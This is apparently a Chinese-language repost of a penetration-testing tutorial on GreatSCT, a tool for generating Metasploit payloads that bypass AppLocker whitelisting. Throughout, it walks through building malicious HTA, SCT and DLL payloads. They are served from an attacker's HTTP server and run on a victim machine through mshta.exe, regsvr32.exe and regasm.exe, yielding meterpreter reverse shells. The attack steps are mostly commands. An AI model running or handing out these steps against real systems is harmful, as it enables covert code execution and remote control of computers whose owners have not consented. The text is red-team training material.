GreatSct –應用程序白名單繞過工具

在編寫Applocker旁路系列時，咱們發現了一個專門用於繞過白名單應用程序的新工具。所以，我決定寫這篇文章，在此咱們將介紹另外一個最有趣的工具「 Great SCT – Metasploit有效負載生成器」工具，該工具與Unicorn或msfvenom相似，由於它依賴於Metasploit框架來提供受害者計算機的反向鏈接。所以，讓咱們從其教程開始並檢查其功能。

表中的內容

• GreatSCT
• 安裝與用法
• 生成惡意的hta文件
• 生成惡意的sct文件
• 生成惡意的dll文件

GreatSCT

GreatSCT當前在@ConsciousHacker的支持下，該項目稱爲Great SCT（偉大的Scott）。Great SCT是一個開源項目，用於生成應用程序白名單繞過。此工具適用於紅色和藍色團隊。它是一種工具，用於生成繞過常見的防病毒解決方案和應用程序白名單解決方案的Metasploit有效負載。

您能夠從這裏下載：https://github.com/GreatSCT/GreatSCT

安裝與用法

必須先下載並安裝它才能開始使用Great SCT。運行如下命令從github下載Great SCT，並在安裝它時注意其依賴項工具。

經過使用如下工具，這有助於繞過Applocker策略：

• Installutil.exe： 安裝程序工具是命令行工具，可以讓您經過運行安裝程序組件來安裝和卸載特定程序集中的服務器資源。
• Msbuild.exe： Microsoft Build Engine是用於構建應用程序的平臺。此引擎，也稱爲MSBuild。
• Mshta.exe： Mshta.exe運行Microsoft HTML應用程序主機，這是Windows OS實用程序，負責運行HTA（HTML應用程序）文件。咱們能夠運行JavaScript或Visual的HTML文件。
• Regasm.exe：程序集註冊工具讀取程序集內的元數據，並將必要的條目添加到註冊表中，從而使COM客戶端能夠透明地建立.NET Framework類。
• Regsvcs.exe： RegSvcs表明Microsoft .NET遠程註冊表服務，因.NET Services安裝而聞名。
• Regsvr32.exe： Regsvr32是一個命令行實用程序，用於在Windows註冊表中註冊和註銷OLE控件，例如DLL和ActiveX控件。

git clone //github.com/GreatSCT/GreatSCT.git

cd GreatSCT

cd setup

./setup.sh

下載完成後，鍵入如下命令以訪問幫助命令：

use Bypass

如今要獲取有效載荷列表：

list

生成惡意的hta文件

如今，從有效負載列表中，您能夠選擇任何人進行所需的攻擊。可是對於這種攻擊，咱們將使用：

use mshta/shellcode_inject/base64_migrate.py

執行命令後，鍵入：

generate

執行generate命令後，它會詢問您要使用哪一種方法。由於咱們將使用msfvenom類型1選擇第一個選項。而後單擊Enter做爲抄表器。而後提供lhost和lport，分別爲192.168.1.10七、4321。

生成shellcode時，它將要求您提供有效負載的名稱。默認狀況下，它將以「有效載荷」做爲名稱。由於我不想給任何名字，因此我只按Enter鍵。

如今，它製做了兩個文件。一個資源文件，另外一個hta文件。

如今，首先，經過輸入如下命令在/ usr / share / greatsct-output / source中啓動python的服務器：

python -m SimpleHTTPServer 80

如今，在受害計算機的命令提示符下執行hta文件。

mshta.exe //192.168.1.107/payload.hta

同時，使用資源文件啓動多重/處理程序。爲此，鍵入：

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

瞧！你有會議。

訪問此處「使用mshta.exe（多種方法）繞過應用程序白名單」，以瞭解有關mshta.exe技術的更多信息。

生成惡意的sct文件

如今，從有效負載列表中，您能夠選擇任何人進行所需的攻擊。可是對於這種攻擊，咱們將使用：

use regsvr32/shellcode_inject/base64_migrate.py

執行命令後，鍵入：

generate

而後它將要求您提供有效載荷。只需按Enter鍵，由於它將 Windows / meterpreter / reverse_tcp 做爲默認有效載荷，而這正是咱們須要的有效載荷。在提供了像這樣的IP以後，咱們給了192.168.1.107和給定的端口（任意），以下圖所示，咱們給lport提供了2345

提供詳細信息後，它將詢問您的惡意軟件名稱。默認狀況下，它將設置名稱「 payload」，以便您能夠輸入名稱或僅按Enter鍵便可使用默認設置。

就像按Enter同樣，它將生成兩個文件。其中一個將是資源文件，其餘將是.sct文件。如今，經過輸入如下內容在/ usr / share / greatsct-output / source中啓動python的服務器：

python -m SimpleHTTPServer 80

如今，在受害者的PC的運行窗口中執行.sct文件，以下所示

1

regsvr32.exe /s /u /n /i://192.168.1.107/payload.sct

同時，使用資源文件啓動多重/處理程序。爲此，鍵入：

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

瞧！你有會議。

訪問此處「使用regsrv32.exe繞過應用程序白名單（多種方法） 」，以瞭解有關mshta.exe技術的更多信息。

生成惡意的dll文件

如今，從有效負載列表中，您能夠選擇任何人進行所需的攻擊。可是對於這種攻擊，咱們將使用：

use regasm/meterpreter/rev_tcp.py

執行命令後，鍵入：

set lhost 192.168.1.107

generate

提供詳細信息後，它將詢問您惡意軟件的名稱。默認狀況下，它將設置名稱「 payload」，以便您能夠輸入名稱或僅按Enter鍵便可使用默認設置。

就像按Enter同樣，它會生成dll文件。

如今，經過輸入如下內容在/ usr / share / greatsct-output / compiled中啓動python的服務器：

python -m SimpleHTTPServer 80

如今將上面生成的dll文件放置在如下位置：C：\ Windows \ Microsoft.NET \ Framework \ v4.0.30319 \ v4.0.30319 \，而後在受害者PC的運行窗口中執行.dll文件，以下所示：

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

同時，使用資源文件啓動多重/處理程序。爲此，鍵入：

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

瞧！你有會議。